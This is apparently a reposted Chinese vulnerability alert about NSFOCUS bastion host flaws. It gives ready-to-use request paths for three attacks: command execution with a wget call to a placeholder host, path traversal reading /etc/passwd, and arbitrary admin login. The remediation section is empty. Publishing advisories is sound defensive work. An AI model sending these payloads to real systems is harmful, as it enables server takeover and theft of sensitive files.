• 暂无

• 高危
  

绿盟堡垒机提供了一套先进的运维安全管控与审计解决方案，目标是帮助企业转变传统IT安全运维的被动响应模式，建立面向用户的集中、主动的运维安全管控模式，降低人为安全风险，满足合规要求，保障企业效益。

简述：绿盟堡垒机旧版本Exec接口存在远程命令执行漏洞，攻击者可构造恶意请求执行任意命令，控制服务器。

/webconf/Exec/index?cmd=wget%20xxx.xxx.xxx

简述：绿盟堡垒机旧版本GetFile存在任意文件读取漏洞，攻击者可构造恶意请求读取遍历系统上的文件，造成敏感信息泄漏。

/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd

简述：绿盟堡垒机存在任意用户登录漏洞，攻击者通过漏洞包含www/local_user.php实现任意⽤户登录。

 /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin

• 未知

0x05 修复建议

原文始发于微信公众号（浅安安全）：漏洞预警 | 绿盟堡垒机命令执行、任意文件读取、任意用户登录漏洞